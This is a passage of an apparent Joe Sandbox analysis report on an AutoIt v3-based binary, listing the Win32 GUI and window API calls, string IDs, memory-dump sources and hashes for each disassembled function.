                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00F14998
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00F149A3
                                                                                                                                • DestroyCursor.USER32(00000000), ref: 00F149AE
                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00F149B9
                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F8E179
                                                                                                                                • 6F3A0200.COMCTL32(?,000000FF,?), ref: 00F8E1B2
                                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00F8E5E0
                                                                                                                                  • Part of subcall function 00F149CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F14954,00000000), ref: 00F14A23
                                                                                                                                • SendMessageW.USER32 ref: 00F8E627
                                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F8E63E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 377055139-4108050209
                                                                                                                                • Opcode ID: eb19e2834049668df3a2c83a10cbd157e6a52200718772af9f5045e6ce224e19
                                                                                                                                • Instruction ID: f6a293087dfe33d1bcbf74d104e1ce075f14da86723897550ab434ed8509c708
                                                                                                                                • Opcode Fuzzy Hash: eb19e2834049668df3a2c83a10cbd157e6a52200718772af9f5045e6ce224e19
                                                                                                                                • Instruction Fuzzy Hash: 9B128F30A00202DFDB24DF14C984BE6BBE5BF45314F58456AF5A9DB262C731EC85EB91
                                                                                                                                Function 00F76189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(?,?,00FADBF0), ref: 00F76245
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                • API String ID: 3964851224-45149045
                                                                                                                                • Opcode ID: 5a38ebf2f1c61e3c94a053fc31ca20f5f586b4d09a16595e243fde46aeac4204
                                                                                                                                • Instruction ID: b49b340441a3a2a4913e7df075258b6a1522ba8a7fb386fe0feb7c6eb5a08abf
                                                                                                                                • Opcode Fuzzy Hash: 5a38ebf2f1c61e3c94a053fc31ca20f5f586b4d09a16595e243fde46aeac4204
                                                                                                                                • Instruction Fuzzy Hash: 5EC1A8342146118BCB04EF14C951BAD77E2AF94354F18846DB84A9B397DF24ED4AFB83
                                                                                                                                Function 00F7D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetSysColor.USER32(00000012), ref: 00F7D3BE
                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00F7D3C2
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00F7D3D8
                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00F7D3E3
                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00F7D3E8
                                                                                                                                • GetSysColor.USER32(00000011), ref: 00F7D400
                                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F7D40E
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00F7D41F
                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00F7D428
                                                                                                                                • SelectObject.GDI32(?,?), ref: 00F7D435
                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00F7D454
                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F7D46B
                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00F7D480
                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F7D4A8
                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F7D4CF
                                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00F7D4ED
                                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00F7D4F8
                                                                                                                                • GetSysColor.USER32(00000011), ref: 00F7D506
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00F7D50E
                                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F7D522
                                                                                                                                • SelectObject.GDI32(?,00F7D0B5), ref: 00F7D539
                                                                                                                                • DeleteObject.GDI32(?), ref: 00F7D544
                                                                                                                                • SelectObject.GDI32(?,?), ref: 00F7D54A
                                                                                                                                • DeleteObject.GDI32(?), ref: 00F7D54F
                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00F7D555
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00F7D55F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1996641542-0
                                                                                                                                • Opcode ID: 6417a5963f2dd1fe957fcced52d032b7e48f2a1780fc59fc669103b2e6d54093
                                                                                                                                • Instruction ID: 104c22811075329c1d0e0f5e7fb0190dad9d8222b091fd301715aa61831a4f98
                                                                                                                                • Opcode Fuzzy Hash: 6417a5963f2dd1fe957fcced52d032b7e48f2a1780fc59fc669103b2e6d54093
                                                                                                                                • Instruction Fuzzy Hash: 54513A72901208AFDF10DFA8DC48EAEBBB9FF48320F254516F915AB2A1D7759940EF50
                                                                                                                                Function 00F7B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F7B5C0
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F7B5D1
                                                                                                                                • CharNextW.USER32(0000014E), ref: 00F7B600
                                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F7B641
                                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F7B657
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F7B668
                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F7B685
                                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00F7B6D7
                                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F7B6ED
                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F7B71E
                                                                                                                                • _memset.LIBCMT ref: 00F7B743
                                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F7B78C
                                                                                                                                • _memset.LIBCMT ref: 00F7B7EB
                                                                                                                                • SendMessageW.USER32 ref: 00F7B815
                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F7B86D
                                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00F7B91A
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00F7B93C
                                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 00F7B986
                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F7B9B3
                                                                                                                                • DrawMenuBar.USER32(?), ref: 00F7B9C2
                                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00F7B9EA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 1073566785-4108050209
                                                                                                                                • Opcode ID: 582f437631ee60a94e17310bccc6bc8f2be02d44945cb5231f7a5c3b8151b1fa
                                                                                                                                • Instruction ID: a5b6a0a8f3aabcd4fcbb9084720ee31d57ee4105c8dad6f4bec4541fbfd1ff31
                                                                                                                                • Opcode Fuzzy Hash: 582f437631ee60a94e17310bccc6bc8f2be02d44945cb5231f7a5c3b8151b1fa
                                                                                                                                • Instruction Fuzzy Hash: 2FE15E71900219ABDB219F64CC84FEE7BB8FF06720F148157F919AA191DB748A41EF62
                                                                                                                                Function 00F7744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetCursorPos.USER32(?), ref: 00F77587
                                                                                                                                • GetDesktopWindow.USER32 ref: 00F7759C
                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00F775A3
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00F77605
                                                                                                                                • DestroyWindow.USER32(?), ref: 00F77631
                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F7765A
                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F77678
                                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F7769E
                                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00F776B3
                                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F776C6
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00F776E6
                                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F77701
                                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F77715
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00F7772D
                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00F77753
                                                                                                                                • GetMonitorInfoW.USER32 ref: 00F7776D
                                                                                                                                • CopyRect.USER32(?,?), ref: 00F77784
                                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00F777EF
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                                • Opcode ID: e39b034116ecf9f80e8be97a5b2512ea69094cc7353e5f56e73f3e4d3c559572
                                                                                                                                • Instruction ID: 9377fc89456cd76b52d430b157b53caeb5171b855f7c1b86b58f4ede1e7c041f
                                                                                                                                • Opcode Fuzzy Hash: e39b034116ecf9f80e8be97a5b2512ea69094cc7353e5f56e73f3e4d3c559572
                                                                                                                                • Instruction Fuzzy Hash: 98B19D71618340AFDB04EF68D945B6ABBE4FF88310F00891EF59D9B291DB74E805DB92
                                                                                                                                Function 00F2A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F2A839
                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00F2A841
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F2A86C
                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00F2A874
                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00F2A899
                                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F2A8B6
                                                                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00F2A8C6
                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F2A8F9
                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F2A90D
                                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00F2A92B
                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00F2A947
                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2A952
                                                                                                                                  • Part of subcall function 00F2B736: GetCursorPos.USER32(000000FF), ref: 00F2B749
                                                                                                                                  • Part of subcall function 00F2B736: ScreenToClient.USER32(00000000,000000FF), ref: 00F2B766
                                                                                                                                  • Part of subcall function 00F2B736: GetAsyncKeyState.USER32(00000001), ref: 00F2B78B
                                                                                                                                  • Part of subcall function 00F2B736: GetAsyncKeyState.USER32(00000002), ref: 00F2B799
                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00F2ACEE), ref: 00F2A979
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                                • Opcode ID: c82a026c4212c545f72919628ec814096119f43562a00d3eb304f9ba5559f5b3
                                                                                                                                • Instruction ID: 96d542b735902761ed39867d7358c3bf72d200706a7e51c9372dd8f6178468ae
                                                                                                                                • Opcode Fuzzy Hash: c82a026c4212c545f72919628ec814096119f43562a00d3eb304f9ba5559f5b3
                                                                                                                                • Instruction Fuzzy Hash: E6B16B71A0021AEFDB14EFA8DD45BEE7BB5FB08314F11422AFA15A7290DB74D840EB51
                                                                                                                                Function 00F769C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00F76A52
                                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F76B12
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                • API String ID: 3974292440-719923060
                                                                                                                                • Opcode ID: 74fe4b1188d69921d094f181eebac5b8d56a9a8ff971374e2828a4afd2556b1e
                                                                                                                                • Instruction ID: 794320d0c19525ad9d03a8314c181b6b3fec415e69107d4d0cc37599d023398f
                                                                                                                                • Opcode Fuzzy Hash: 74fe4b1188d69921d094f181eebac5b8d56a9a8ff971374e2828a4afd2556b1e
                                                                                                                                • Instruction Fuzzy Hash: 61A1A7306147119FC704EF14DD51BAAB7E5EF85314F14886EB89A9B392DB38EC09EB42
                                                                                                                                Function 00F4E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 00F4E6E1
                                                                                                                                • _wcscmp.LIBCMT ref: 00F4E6F2
                                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F4E71A
                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00F4E737
                                                                                                                                • _wcscmp.LIBCMT ref: 00F4E755
                                                                                                                                • _wcsstr.LIBCMT ref: 00F4E766
                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00F4E79E
                                                                                                                                • _wcscmp.LIBCMT ref: 00F4E7AE
                                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F4E7D5
                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00F4E81E
                                                                                                                                • _wcscmp.LIBCMT ref: 00F4E82E
                                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 00F4E856
                                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 00F4E8BF
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                                • API String ID: 1788623398-1539354611
                                                                                                                                • Opcode ID: 3b77d32f765b12f2ecd69b943db4cdf6de02e21f1278d159854dd56e108c8c86
                                                                                                                                • Instruction ID: f22d9e51fe050c2c6ef34c2d51c3ef5da6723480d10a803cbcbcbb858e27df2a
                                                                                                                                • Opcode Fuzzy Hash: 3b77d32f765b12f2ecd69b943db4cdf6de02e21f1278d159854dd56e108c8c86
                                                                                                                                • Instruction Fuzzy Hash: 1881AF314083099BDB05DF20C881FAA7FE8FF54724F14846AFD999A096DB34DD45EBA1
                                                                                                                                Function 00F4E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                • API String ID: 1038674560-1810252412
                                                                                                                                • Opcode ID: 627b51a69490e3357458fec3d46c3c16c9798bb018857c50e58cf5af11b9adbc
                                                                                                                                • Instruction ID: 755e22dd76aef3bb9254465480b9de39e41c25a5f73bd507c25fc4b5be9433c0
                                                                                                                                • Opcode Fuzzy Hash: 627b51a69490e3357458fec3d46c3c16c9798bb018857c50e58cf5af11b9adbc
                                                                                                                                • Instruction Fuzzy Hash: C1317A31A44206A6DB54FB60CE53FEE77A4AF20B24F600428F851B10D6FF99AF44B652
                                                                                                                                Function 00F4F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadIconW.USER32(00000063), ref: 00F4F8AB
                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F4F8BD
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00F4F8D4
                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00F4F8E9
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00F4F8EF
                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00F4F8FF
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00F4F905
                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F4F926
                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F4F940
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00F4F949
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00F4F9B4
                                                                                                                                • GetDesktopWindow.USER32 ref: 00F4F9BA
                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00F4F9C1
                                                                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F4FA0D
                                                                                                                                • GetClientRect.USER32(?,?), ref: 00F4FA1A
                                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F4FA3F
                                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F4FA6A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
